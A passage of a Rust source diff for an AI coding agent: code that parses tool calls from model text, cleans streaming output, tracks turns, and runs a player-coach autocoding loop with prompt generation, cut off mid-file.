let args = if let Some(args_start) = inner.find("args =>") {
|
||||
let args_str = inner[args_start + 7..].trim();
|
||||
// Try to parse as JSON first
|
||||
if let Ok(args_json) = serde_json::from_str::<Value>(args_str) {
|
||||
args_json
|
||||
} else if let Some(brace_start) = args_str.find('{') {
|
||||
// Try to extract the content between braces
|
||||
let mut brace_count = 0;
|
||||
let mut end_idx = brace_start;
|
||||
for (i, c) in args_str[brace_start..].chars().enumerate() {
|
||||
match c {
|
||||
'{' => brace_count += 1,
|
||||
'}' => {
|
||||
brace_count -= 1;
|
||||
if brace_count == 0 {
|
||||
end_idx = brace_start + i + 1;
|
||||
break;
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
let content = &args_str[brace_start + 1..end_idx - 1];
|
||||
|
||||
// Try to parse as JSON
|
||||
if let Ok(json) = serde_json::from_str::<Value>(&format!("{{{content}}}")) {
|
||||
json
|
||||
} else {
|
||||
// Try CLI-style args: --arg_name "value" or --arg_name value
|
||||
parse_cli_style_args(content)
|
||||
}
|
||||
} else {
|
||||
json!({})
|
||||
}
|
||||
} else {
|
||||
json!({})
|
||||
};
|
||||
|
||||
*id_counter += 1;
|
||||
Some(ParsedToolCall {
|
||||
name,
|
||||
args,
|
||||
id: format!("text_tool_{id_counter}"),
|
||||
})
|
||||
}
|
||||
|
||||
/// Parse CLI-style arguments: --`arg_name` "value" or --`arg_name` value
|
||||
fn parse_cli_style_args(content: &str) -> Value {
|
||||
let mut map = serde_json::Map::new();
|
||||
|
||||
// Pattern: --arg_name "value" or --arg_name 'value' or --arg_name value
|
||||
let arg_regex =
|
||||
Regex::new(r#"--([a-zA-Z_][a-zA-Z0-9_]*)\s+(?:"([^"]*)"|'([^']*)'|(\S+))"#).ok();
|
||||
|
||||
if let Some(regex) = arg_regex {
|
||||
for cap in regex.captures_iter(content) {
|
||||
if let Some(arg_name) = cap.get(1) {
|
||||
let arg_name = arg_name.as_str();
|
||||
// Get the value from whichever capture group matched
|
||||
let value = cap
|
||||
.get(2)
|
||||
.or_else(|| cap.get(3))
|
||||
.or_else(|| cap.get(4))
|
||||
.map_or("", |m| m.as_str());
|
||||
|
||||
// Try to parse as JSON value, otherwise use as string
|
||||
let json_value = serde_json::from_str(value)
|
||||
.unwrap_or_else(|_| Value::String(value.to_string()));
|
||||
map.insert(arg_name.to_string(), json_value);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Also try simple key=value format
|
||||
let kv_regex =
|
||||
Regex::new(r#"([a-zA-Z_][a-zA-Z0-9_]*)\s*[:=]\s*(?:"([^"]*)"|'([^']*)'|(\S+))"#).ok();
|
||||
if let Some(regex) = kv_regex {
|
||||
for cap in regex.captures_iter(content) {
|
||||
if let Some(key) = cap.get(1) {
|
||||
let key = key.as_str();
|
||||
if !map.contains_key(key) {
|
||||
let value = cap
|
||||
.get(2)
|
||||
.or_else(|| cap.get(3))
|
||||
.or_else(|| cap.get(4))
|
||||
.map_or("", |m| m.as_str());
|
||||
let json_value = serde_json::from_str(value)
|
||||
.unwrap_or_else(|_| Value::String(value.to_string()));
|
||||
map.insert(key.to_string(), json_value);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Value::Object(map)
|
||||
}
|
||||
|
||||
/// Try to parse a flexible format.
|
||||
fn parse_flexible_format(inner: &str, id_counter: &mut u32) -> Option<ParsedToolCall> {
|
||||
// Look for common patterns like:
|
||||
// tool: list_dir
|
||||
// name: "list_dir"
|
||||
// function: list_dir
|
||||
|
||||
let patterns = [(
|
||||
r#"(?:tool|name|function)\s*[:=]\s*"?([a-zA-Z_][a-zA-Z0-9_]*)"?"#,
|
||||
1,
|
||||
)];
|
||||
|
||||
for (pattern, group) in patterns {
|
||||
if let Ok(regex) = Regex::new(pattern)
|
||||
&& let Some(cap) = regex.captures(inner)
|
||||
&& let Some(name_match) = cap.get(group)
|
||||
{
|
||||
let name = name_match.as_str().to_string();
|
||||
|
||||
// Try to extract args/input as JSON
|
||||
let args = extract_json_object(inner).unwrap_or(json!({}));
|
||||
|
||||
*id_counter += 1;
|
||||
return Some(ParsedToolCall {
|
||||
name,
|
||||
args,
|
||||
id: format!("text_tool_{id_counter}"),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
None
|
||||
}
|
||||
|
||||
/// Extract the first JSON object from a string.
|
||||
fn extract_json_object(text: &str) -> Option<Value> {
|
||||
let start = text.find('{')?;
|
||||
let mut brace_count = 0;
|
||||
let mut end_idx = start;
|
||||
|
||||
for (i, c) in text[start..].chars().enumerate() {
|
||||
match c {
|
||||
'{' => brace_count += 1,
|
||||
'}' => {
|
||||
brace_count -= 1;
|
||||
if brace_count == 0 {
|
||||
end_idx = start + i + 1;
|
||||
break;
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
let json_str = &text[start..end_idx];
|
||||
serde_json::from_str(json_str).ok()
|
||||
}
|
||||
|
||||
/// Check if text contains tool call markers (either format).
|
||||
pub fn has_tool_call_markers(text: &str) -> bool {
|
||||
text.contains("[TOOL_CALL]")
|
||||
|| text.contains("<deepseek:tool_call")
|
||||
|| text.contains("<tool_call")
|
||||
|| text.contains("<invoke ")
|
||||
}
|
||||
|
||||
/// Clean streaming text by removing partial tool call markers and thinking tags.
|
||||
/// This is used during streaming to prevent raw markers from appearing in the UI.
|
||||
pub fn clean_streaming_text(text: &str) -> String {
|
||||
let mut result = text.to_string();
|
||||
|
||||
// Remove thinking tags
|
||||
let thinking_regex = get_thinking_regex();
|
||||
result = thinking_regex.replace_all(&result, "").to_string();
|
||||
|
||||
// Remove [TOOL_CALL] blocks entirely
|
||||
let tool_call_regex = get_tool_call_regex();
|
||||
result = tool_call_regex.replace_all(&result, "").to_string();
|
||||
|
||||
// Remove XML-style partial markers that might appear during streaming
|
||||
let patterns_to_remove = [
|
||||
r"\[TOOL_CALL\]",
|
||||
r"\[/TOOL_CALL\]",
|
||||
r"</?deepseek:tool_call[^>]*>",
|
||||
r"</?tool_call[^>]*>",
|
||||
r"<invoke\s+name\s*=\s*[^>]*>",
|
||||
r"</invoke>",
|
||||
r"</?parameter[^>]*>",
|
||||
r"</?param[^>]*>",
|
||||
r"</?function_calls>",
|
||||
r"</?antml:invoke[^>]*>",
|
||||
r"</?antml:function_calls>",
|
||||
// Also remove the tool call content patterns
|
||||
r"\{tool\s*=>\s*[^}]+\}",
|
||||
];
|
||||
|
||||
for pattern in patterns_to_remove {
|
||||
if let Ok(regex) = Regex::new(pattern) {
|
||||
result = regex.replace_all(&result, "").to_string();
|
||||
}
|
||||
}
|
||||
|
||||
// Clean up extra whitespace and empty lines
|
||||
result = result
|
||||
.lines()
|
||||
.filter(|line| !line.trim().is_empty())
|
||||
.collect::<Vec<_>>()
|
||||
.join("\n");
|
||||
|
||||
result.trim().to_string()
|
||||
}
|
||||
|
||||
/// Check if a streaming chunk contains the start of a tool call marker.
|
||||
/// This is used to suppress streaming output when we detect the start of a tool block.
|
||||
pub fn is_tool_call_start(text: &str) -> bool {
|
||||
text.contains("[TOOL_CALL]")
|
||||
|| text.contains("<deepseek:tool_call")
|
||||
|| text.contains("<tool_call")
|
||||
|| text.contains("<invoke ")
|
||||
|| text.contains("<function_calls>")
|
||||
|| text.contains("<function_calls>")
|
||||
}
|
||||
|
||||
/// Check if a streaming chunk contains the end of a tool call marker.
|
||||
pub fn is_tool_call_end(text: &str) -> bool {
|
||||
text.contains("[/TOOL_CALL]")
|
||||
|| text.contains("</deepseek:tool_call>")
|
||||
|| text.contains("</tool_call>")
|
||||
|| text.contains("</invoke>")
|
||||
|| text.contains("</function_calls>")
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_parse_arrow_syntax() {
|
||||
let text = r#"I'll list the directory.
|
||||
[TOOL_CALL]
|
||||
{tool => "list_dir", args => {}}
|
||||
[/TOOL_CALL]"#;
|
||||
|
||||
let result = parse_tool_calls(text);
|
||||
assert_eq!(result.tool_calls.len(), 1);
|
||||
assert_eq!(result.tool_calls[0].name, "list_dir");
|
||||
assert_eq!(result.clean_text, "I'll list the directory.");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_parse_json_syntax() {
|
||||
let text = r#"Let me check.
|
||||
[TOOL_CALL]
|
||||
{"tool": "read_file", "args": {"path": "test.txt"}}
|
||||
[/TOOL_CALL]"#;
|
||||
|
||||
let result = parse_tool_calls(text);
|
||||
assert_eq!(result.tool_calls.len(), 1);
|
||||
assert_eq!(result.tool_calls[0].name, "read_file");
|
||||
assert_eq!(result.tool_calls[0].args["path"], "test.txt");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_parse_multiple_tool_calls() {
|
||||
let text = r#"First I'll list, then read.
|
||||
[TOOL_CALL]
|
||||
{tool => "list_dir", args => {}}
|
||||
[/TOOL_CALL]
|
||||
[TOOL_CALL]
|
||||
{tool => "read_file", args => {"path": "file.txt"}}
|
||||
[/TOOL_CALL]"#;
|
||||
|
||||
let result = parse_tool_calls(text);
|
||||
assert_eq!(result.tool_calls.len(), 2);
|
||||
assert_eq!(result.tool_calls[0].name, "list_dir");
|
||||
assert_eq!(result.tool_calls[1].name, "read_file");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_tool_calls() {
|
||||
let text = "Just some regular text without any tool calls.";
|
||||
let result = parse_tool_calls(text);
|
||||
assert!(result.tool_calls.is_empty());
|
||||
assert_eq!(result.clean_text, text);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_has_markers() {
|
||||
assert!(has_tool_call_markers("[TOOL_CALL]test[/TOOL_CALL]"));
|
||||
assert!(!has_tool_call_markers("no markers here"));
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,119 @@
|
||||
//! Turn context and tracking.
|
||||
//!
|
||||
//! A "turn" is one user message and the resulting AI response,
|
||||
//! including any tool calls that occur.
|
||||
|
||||
use crate::models::Usage;
|
||||
use std::time::{Duration, Instant};
|
||||
|
||||
/// Context for a single turn (user message + AI response).
|
||||
#[derive(Debug)]
|
||||
pub struct TurnContext {
|
||||
/// Turn ID
|
||||
pub id: String,
|
||||
|
||||
/// When the turn started
|
||||
pub started_at: Instant,
|
||||
|
||||
/// Current step in the turn (tool call iteration)
|
||||
pub step: u32,
|
||||
|
||||
/// Maximum steps allowed
|
||||
pub max_steps: u32,
|
||||
|
||||
/// Tool calls made in this turn
|
||||
pub tool_calls: Vec<TurnToolCall>,
|
||||
|
||||
/// Whether the turn has been cancelled
|
||||
pub cancelled: bool,
|
||||
|
||||
/// Usage for this turn
|
||||
pub usage: Usage,
|
||||
}
|
||||
|
||||
/// Record of a tool call within a turn.
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct TurnToolCall {
|
||||
pub id: String,
|
||||
pub name: String,
|
||||
pub input: serde_json::Value,
|
||||
pub result: Option<String>,
|
||||
pub error: Option<String>,
|
||||
pub duration: Option<Duration>,
|
||||
}
|
||||
|
||||
impl TurnContext {
|
||||
/// Create a new turn context
|
||||
pub fn new(max_steps: u32) -> Self {
|
||||
Self {
|
||||
id: uuid::Uuid::new_v4().to_string(),
|
||||
started_at: Instant::now(),
|
||||
step: 0,
|
||||
max_steps,
|
||||
tool_calls: Vec::new(),
|
||||
cancelled: false,
|
||||
usage: Usage {
|
||||
input_tokens: 0,
|
||||
output_tokens: 0,
|
||||
},
|
||||
}
|
||||
}
|
||||
|
||||
/// Increment the step counter
|
||||
pub fn next_step(&mut self) -> bool {
|
||||
self.step += 1;
|
||||
self.step <= self.max_steps
|
||||
}
|
||||
|
||||
/// Check if the turn has reached max steps
|
||||
pub fn at_max_steps(&self) -> bool {
|
||||
self.step >= self.max_steps
|
||||
}
|
||||
|
||||
/// Record a tool call
|
||||
pub fn record_tool_call(&mut self, call: TurnToolCall) {
|
||||
self.tool_calls.push(call);
|
||||
}
|
||||
|
||||
/// Cancel the turn
|
||||
pub fn cancel(&mut self) {
|
||||
self.cancelled = true;
|
||||
}
|
||||
|
||||
/// Get the elapsed time
|
||||
pub fn elapsed(&self) -> Duration {
|
||||
self.started_at.elapsed()
|
||||
}
|
||||
|
||||
/// Add usage from an API response
|
||||
pub fn add_usage(&mut self, usage: &Usage) {
|
||||
self.usage.input_tokens += usage.input_tokens;
|
||||
self.usage.output_tokens += usage.output_tokens;
|
||||
}
|
||||
}
|
||||
|
||||
impl TurnToolCall {
|
||||
/// Create a new tool call record
|
||||
pub fn new(id: String, name: String, input: serde_json::Value) -> Self {
|
||||
Self {
|
||||
id,
|
||||
name,
|
||||
input,
|
||||
result: None,
|
||||
error: None,
|
||||
duration: None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Set the result
|
||||
pub fn set_result(&mut self, result: String, duration: Duration) {
|
||||
self.result = Some(result);
|
||||
self.duration = Some(duration);
|
||||
}
|
||||
|
||||
/// Set an error
|
||||
pub fn set_error(&mut self, error: String, duration: Duration) {
|
||||
self.error = Some(error);
|
||||
self.duration = Some(duration);
|
||||
}
|
||||
}
|
||||
+802
@@ -0,0 +1,802 @@
|
||||
//! Duo mode state machine for hegelion's autocoding (player-coach adversarial cooperation).
|
||||
//!
|
||||
//! Implements the g3 paper's coach-player paradigm where:
|
||||
//! - Player: implements requirements (builder role)
|
||||
//! - Coach: validates implementation against requirements (critic role)
|
||||
//!
|
||||
//! The loop continues until the coach approves or max turns are reached.
|
||||
|
||||
use std::collections::HashMap;
|
||||
use std::sync::{Arc, Mutex};
|
||||
|
||||
use serde::{Deserialize, Serialize};
|
||||
use uuid::Uuid;
|
||||
|
||||
// === Phase & Status Enums ===
|
||||
|
||||
/// The current phase in the autocoding loop.
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
|
||||
pub enum DuoPhase {
|
||||
/// Session initialized, ready to start player phase
|
||||
Init,
|
||||
/// Player is implementing requirements
|
||||
Player,
|
||||
/// Coach is validating the implementation
|
||||
Coach,
|
||||
/// Coach approved the implementation
|
||||
Approved,
|
||||
/// Maximum turns reached without approval
|
||||
Timeout,
|
||||
}
|
||||
|
||||
impl std::fmt::Display for DuoPhase {
|
||||
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
|
||||
match self {
|
||||
DuoPhase::Init => write!(f, "init"),
|
||||
DuoPhase::Player => write!(f, "player"),
|
||||
DuoPhase::Coach => write!(f, "coach"),
|
||||
DuoPhase::Approved => write!(f, "approved"),
|
||||
DuoPhase::Timeout => write!(f, "timeout"),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// The overall status of the autocoding session.
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
|
||||
pub enum DuoStatus {
|
||||
/// Session is actively running
|
||||
Active,
|
||||
/// Coach has approved the implementation
|
||||
Approved,
|
||||
/// Coach has rejected (used for explicit rejection, not just iteration)
|
||||
Rejected,
|
||||
/// Maximum turns exhausted without approval
|
||||
Timeout,
|
||||
}
|
||||
|
||||
impl std::fmt::Display for DuoStatus {
|
||||
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
|
||||
match self {
|
||||
DuoStatus::Active => write!(f, "active"),
|
||||
DuoStatus::Approved => write!(f, "approved"),
|
||||
DuoStatus::Rejected => write!(f, "rejected"),
|
||||
DuoStatus::Timeout => write!(f, "timeout"),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// === Turn History ===
|
||||
|
||||
/// Record of a single turn in the autocoding loop.
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct TurnRecord {
|
||||
/// Turn number (1-indexed)
|
||||
pub turn: u32,
|
||||
/// The phase this record is for
|
||||
pub phase: DuoPhase,
|
||||
/// Summary of what happened (player implementation or coach feedback)
|
||||
pub summary: String,
|
||||
/// Quality score from coach (0.0 to 1.0), if applicable
|
||||
pub quality_score: Option<f64>,
|
||||
/// Timestamp when this turn was recorded
|
||||
#[serde(default = "chrono::Utc::now")]
|
||||
pub timestamp: chrono::DateTime<chrono::Utc>,
|
||||
}
|
||||
|
||||
impl TurnRecord {
|
||||
/// Create a new turn record.
|
||||
#[must_use]
|
||||
pub fn new(turn: u32, phase: DuoPhase, summary: String, quality_score: Option<f64>) -> Self {
|
||||
Self {
|
||||
turn,
|
||||
phase,
|
||||
summary,
|
||||
quality_score,
|
||||
timestamp: chrono::Utc::now(),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// === Main State ===
|
||||
|
||||
/// The complete state of a Duo autocoding session.
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct DuoState {
|
||||
/// Unique session identifier
|
||||
pub session_id: String,
|
||||
/// Optional human-readable session name
|
||||
pub session_name: Option<String>,
|
||||
/// The requirements document (source of truth for validation)
|
||||
pub requirements: String,
|
||||
/// Current turn number (1-indexed)
|
||||
pub current_turn: u32,
|
||||
/// Maximum allowed turns before timeout
|
||||
pub max_turns: u32,
|
||||
/// Current phase in the autocoding loop
|
||||
pub phase: DuoPhase,
|
||||
/// Overall session status
|
||||
pub status: DuoStatus,
|
||||
/// History of all turns
|
||||
pub turn_history: Vec<TurnRecord>,
|
||||
/// Last feedback from the coach (used in next player prompt)
|
||||
pub last_coach_feedback: Option<String>,
|
||||
/// Quality scores from each coach review
|
||||
pub quality_scores: Vec<f64>,
|
||||
/// Threshold score needed for approval (0.0 to 1.0)
|
||||
pub approval_threshold: f64,
|
||||
/// Timestamp when session was created
|
||||
#[serde(default = "chrono::Utc::now")]
|
||||
pub created_at: chrono::DateTime<chrono::Utc>,
|
||||
/// Timestamp of last update
|
||||
#[serde(default = "chrono::Utc::now")]
|
||||
pub updated_at: chrono::DateTime<chrono::Utc>,
|
||||
}
|
||||
|
||||
impl DuoState {
|
||||
/// Create a new Duo session with the given requirements.
|
||||
///
|
||||
/// # Arguments
|
||||
/// * `requirements` - The requirements document (source of truth)
|
||||
/// * `session_name` - Optional human-readable name
|
||||
/// * `max_turns` - Maximum turns before timeout (default: 10)
|
||||
/// * `approval_threshold` - Score needed for approval (default: 0.9)
|
||||
#[must_use]
|
||||
pub fn create(
|
||||
requirements: String,
|
||||
session_name: Option<String>,
|
||||
max_turns: Option<u32>,
|
||||
approval_threshold: Option<f64>,
|
||||
) -> Self {
|
||||
let now = chrono::Utc::now();
|
||||
Self {
|
||||
session_id: Uuid::new_v4().to_string(),
|
||||
session_name,
|
||||
requirements,
|
||||
current_turn: 1,
|
||||
max_turns: max_turns.unwrap_or(10),
|
||||
phase: DuoPhase::Init,
|
||||
status: DuoStatus::Active,
|
||||
turn_history: Vec::new(),
|
||||
last_coach_feedback: None,
|
||||
quality_scores: Vec::new(),
|
||||
approval_threshold: approval_threshold.unwrap_or(0.9),
|
||||
created_at: now,
|
||||
updated_at: now,
|
||||
}
|
||||
}
|
||||
|
||||
/// Transition from Init or Player phase to Coach phase.
|
||||
///
|
||||
/// Records the player's implementation summary in turn history.
|
||||
///
|
||||
/// # Arguments
|
||||
/// * `player_summary` - Summary of what the player implemented
|
||||
///
|
||||
/// # Returns
|
||||
/// `Ok(())` on success, `Err` if not in a valid phase for this transition
|
||||
pub fn advance_to_coach(&mut self, player_summary: String) -> Result<(), DuoError> {
|
||||
match self.phase {
|
||||
DuoPhase::Init | DuoPhase::Player => {
|
||||
// Record player turn
|
||||
let record =
|
||||
TurnRecord::new(self.current_turn, DuoPhase::Player, player_summary, None);
|
||||
self.turn_history.push(record);
|
||||
self.phase = DuoPhase::Coach;
|
||||
self.updated_at = chrono::Utc::now();
|
||||
Ok(())
|
||||
}
|
||||
_ => Err(DuoError::InvalidPhaseTransition {
|
||||
from: self.phase,
|
||||
to: DuoPhase::Coach,
|
||||
}),
|
||||
}
|
||||
}
|
||||
|
||||
/// Process coach feedback and determine the next phase.
|
||||
///
|
||||
/// # Arguments
|
||||
/// * `coach_feedback` - The coach's feedback text
|
||||
/// * `approved` - Whether the coach approved the implementation
|
||||
/// * `compliance_score` - Optional compliance score (0.0 to 1.0)
|
||||
///
|
||||
/// # Returns
|
||||
/// `Ok(())` on success, `Err` if not in coach phase
|
||||
pub fn advance_turn(
|
||||
&mut self,
|
||||
coach_feedback: String,
|
||||
approved: bool,
|
||||
compliance_score: Option<f64>,
|
||||
) -> Result<(), DuoError> {
|
||||
if self.phase != DuoPhase::Coach {
|
||||
return Err(DuoError::InvalidPhaseTransition {
|
||||
from: self.phase,
|
||||
to: DuoPhase::Player,
|
||||
});
|
||||
}
|
||||
|
||||
// Record coach turn
|
||||
let record = TurnRecord::new(
|
||||
self.current_turn,
|
||||
DuoPhase::Coach,
|
||||
coach_feedback.clone(),
|
||||
compliance_score,
|
||||
);
|
||||
self.turn_history.push(record);
|
||||
|
||||
// Track quality score if provided
|
||||
if let Some(score) = compliance_score {
|
||||
self.quality_scores.push(score);
|
||||
}
|
||||
|
||||
self.last_coach_feedback = Some(coach_feedback);
|
||||
self.updated_at = chrono::Utc::now();
|
||||
|
||||
if approved {
|
||||
// Coach approved - session complete
|
||||
self.phase = DuoPhase::Approved;
|
||||
self.status = DuoStatus::Approved;
|
||||
} else if self.current_turn >= self.max_turns {
|
||||
// Max turns reached - timeout
|
||||
self.phase = DuoPhase::Timeout;
|
||||
self.status = DuoStatus::Timeout;
|
||||
} else {
|
||||
// Continue to next turn
|
||||
self.current_turn += 1;
|
||||
self.phase = DuoPhase::Player;
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Check if the session is complete (approved or timed out).
|
||||
#[must_use]
|
||||
pub fn is_complete(&self) -> bool {
|
||||
matches!(
|
||||
self.status,
|
||||
DuoStatus::Approved | DuoStatus::Rejected | DuoStatus::Timeout
|
||||
)
|
||||
}
|
||||
|
||||
/// Get the number of turns remaining before timeout.
|
||||
#[must_use]
|
||||
pub fn turns_remaining(&self) -> u32 {
|
||||
self.max_turns.saturating_sub(self.current_turn)
|
||||
}
|
||||
|
||||
/// Get the average quality score across all coach reviews.
|
||||
#[must_use]
|
||||
pub fn average_quality_score(&self) -> Option<f64> {
|
||||
if self.quality_scores.is_empty() {
|
||||
None
|
||||
} else {
|
||||
let sum: f64 = self.quality_scores.iter().sum();
|
||||
Some(sum / self.quality_scores.len() as f64)
|
||||
}
|
||||
}
|
||||
|
||||
/// Generate a human-readable summary of the session state.
|
||||
#[must_use]
|
||||
pub fn summary(&self) -> String {
|
||||
let name = self
|
||||
.session_name
|
||||
.as_deref()
|
||||
.unwrap_or(&self.session_id[..8]);
|
||||
|
||||
let avg_score = self
|
||||
.average_quality_score()
|
||||
.map(|s| format!("{:.1}%", s * 100.0))
|
||||
.unwrap_or_else(|| "N/A".to_string());
|
||||
|
||||
let status_icon = match self.status {
|
||||
DuoStatus::Active => "🔄",
|
||||
DuoStatus::Approved => "✅",
|
||||
DuoStatus::Rejected => "❌",
|
||||
DuoStatus::Timeout => "⏰",
|
||||
};
|
||||
|
||||
format!(
|
||||
"{status_icon} Duo Session: {name}\n\
|
||||
Phase: {} | Turn: {}/{} | Status: {}\n\
|
||||
Avg Quality: {} | Threshold: {:.0}%\n\
|
||||
History: {} records",
|
||||
self.phase,
|
||||
self.current_turn,
|
||||
self.max_turns,
|
||||
self.status,
|
||||
avg_score,
|
||||
self.approval_threshold * 100.0,
|
||||
self.turn_history.len()
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
// === Error Types ===
|
||||
|
||||
/// Errors that can occur during Duo session operations.
|
||||
#[derive(Debug, Clone)]
|
||||
pub enum DuoError {
|
||||
/// Invalid phase transition attempted
|
||||
InvalidPhaseTransition { from: DuoPhase, to: DuoPhase },
|
||||
/// Session not found (reserved for future multi-session management)
|
||||
#[allow(dead_code)]
|
||||
SessionNotFound { session_id: String },
|
||||
/// Session already complete (reserved for future session validation)
|
||||
#[allow(dead_code)]
|
||||
SessionAlreadyComplete { session_id: String },
|
||||
}
|
||||
|
||||
impl std::fmt::Display for DuoError {
|
||||
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
|
||||
match self {
|
||||
DuoError::InvalidPhaseTransition { from, to } => {
|
||||
write!(f, "Invalid phase transition from {} to {}", from, to)
|
||||
}
|
||||
DuoError::SessionNotFound { session_id } => {
|
||||
write!(f, "Session not found: {}", session_id)
|
||||
}
|
||||
DuoError::SessionAlreadyComplete { session_id } => {
|
||||
write!(f, "Session already complete: {}", session_id)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
impl std::error::Error for DuoError {}
|
||||
|
||||
// === Session Container ===
|
||||
|
||||
/// Container for managing multiple Duo sessions.
|
||||
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
|
||||
pub struct DuoSession {
|
||||
/// The currently active session state
|
||||
pub active_state: Option<DuoState>,
|
||||
/// Saved/completed session states indexed by session_id
|
||||
pub saved_states: HashMap<String, DuoState>,
|
||||
}
|
||||
|
||||
impl DuoSession {
|
||||
/// Create a new empty session container.
|
||||
#[must_use]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
active_state: None,
|
||||
saved_states: HashMap::new(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Start a new Duo session.
|
||||
pub fn start_session(
|
||||
&mut self,
|
||||
requirements: String,
|
||||
session_name: Option<String>,
|
||||
max_turns: Option<u32>,
|
||||
approval_threshold: Option<f64>,
|
||||
) -> &DuoState {
|
||||
// Save any existing active session
|
||||
if let Some(state) = self.active_state.take() {
|
||||
self.saved_states.insert(state.session_id.clone(), state);
|
||||
}
|
||||
|
||||
// Create new session
|
||||
let state = DuoState::create(requirements, session_name, max_turns, approval_threshold);
|
||||
self.active_state = Some(state);
|
||||
self.active_state.as_ref().expect("just set active_state")
|
||||
}
|
||||
|
||||
/// Get the active session state.
|
||||
#[must_use]
|
||||
pub fn get_active(&self) -> Option<&DuoState> {
|
||||
self.active_state.as_ref()
|
||||
}
|
||||
|
||||
/// Get a mutable reference to the active session state.
|
||||
pub fn get_active_mut(&mut self) -> Option<&mut DuoState> {
|
||||
self.active_state.as_mut()
|
||||
}
|
||||
|
||||
/// Get a saved session by ID (reserved for future multi-session management).
|
||||
#[must_use]
|
||||
#[allow(dead_code)]
|
||||
pub fn get_saved(&self, session_id: &str) -> Option<&DuoState> {
|
||||
self.saved_states.get(session_id)
|
||||
}
|
||||
|
||||
/// Save the current active session and clear it (reserved for future session management).
|
||||
#[allow(dead_code)]
|
||||
pub fn save_active(&mut self) -> Option<String> {
|
||||
if let Some(state) = self.active_state.take() {
|
||||
let id = state.session_id.clone();
|
||||
self.saved_states.insert(id.clone(), state);
|
||||
Some(id)
|
||||
} else {
|
||||
None
|
||||
}
|
||||
}
|
||||
|
||||
/// Restore a saved session as the active session (reserved for future session management).
|
||||
#[allow(dead_code)]
|
||||
pub fn restore_session(&mut self, session_id: &str) -> Result<(), DuoError> {
|
||||
let state =
|
||||
self.saved_states
|
||||
.remove(session_id)
|
||||
.ok_or_else(|| DuoError::SessionNotFound {
|
||||
session_id: session_id.to_string(),
|
||||
})?;
|
||||
|
||||
// Save current active if any
|
||||
if let Some(current) = self.active_state.take() {
|
||||
self.saved_states
|
||||
.insert(current.session_id.clone(), current);
|
||||
}
|
||||
|
||||
self.active_state = Some(state);
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// List all session IDs (active and saved, reserved for future session management).
|
||||
#[must_use]
|
||||
#[allow(dead_code)]
|
||||
pub fn list_sessions(&self) -> Vec<&str> {
|
||||
let mut ids: Vec<&str> = self.saved_states.keys().map(String::as_str).collect();
|
||||
if let Some(ref active) = self.active_state {
|
||||
ids.push(&active.session_id);
|
||||
}
|
||||
ids.sort();
|
||||
ids
|
||||
}
|
||||
}
|
||||
|
||||
/// Thread-safe shared Duo session.
|
||||
pub type SharedDuoSession = Arc<Mutex<DuoSession>>;
|
||||
|
||||
/// Create a new shared Duo session.
|
||||
#[must_use]
|
||||
pub fn new_shared_duo_session() -> SharedDuoSession {
|
||||
Arc::new(Mutex::new(DuoSession::new()))
|
||||
}
|
||||
|
||||
// === Prompt Generation ===
|
||||
|
||||
/// Generate the player (implementation) prompt for the current state.
|
||||
///
|
||||
/// The player focuses on implementing requirements and should NOT declare success.
|
||||
#[must_use]
|
||||
pub fn generate_player_prompt(state: &DuoState) -> String {
|
||||
let mut prompt = String::new();
|
||||
|
||||
prompt.push_str("# Player Phase - Implementation\n\n");
|
||||
prompt.push_str("You are the PLAYER in an autocoding session. Your role is to IMPLEMENT the requirements.\n\n");
|
||||
|
||||
prompt.push_str("## Requirements (Source of Truth)\n\n");
|
||||
prompt.push_str(&state.requirements);
|
||||
prompt.push_str("\n\n");
|
||||
|
||||
prompt.push_str(&format!(
|
||||
"## Session Info\n\n\
|
||||
- Turn: {}/{}\n\
|
||||
- Approval Threshold: {:.0}%\n",
|
||||
state.current_turn,
|
||||
state.max_turns,
|
||||
state.approval_threshold * 100.0
|
||||
));
|
||||
|
||||
if let Some(ref feedback) = state.last_coach_feedback {
|
||||
prompt.push_str("\n## Previous Coach Feedback\n\n");
|
||||
prompt.push_str("Address these issues from the last review:\n\n");
|
||||
prompt.push_str(feedback);
|
||||
prompt.push('\n');
|
||||
}
|
||||
|
||||
prompt.push_str("\n## Instructions\n\n");
|
||||
prompt.push_str(
|
||||
"1. Implement the requirements above using available tools\n\
|
||||
2. Focus on making incremental progress\n\
|
||||
3. DO NOT declare success or claim completion\n\
|
||||
4. DO NOT evaluate your own work\n\
|
||||
5. The Coach will verify your implementation\n\n\
|
||||
Begin implementation now.\n",
|
||||
);
|
||||
|
||||
prompt
|
||||
}
|
||||
|
||||
/// Generate the coach (validation) prompt for the current state.
|
||||
///
|
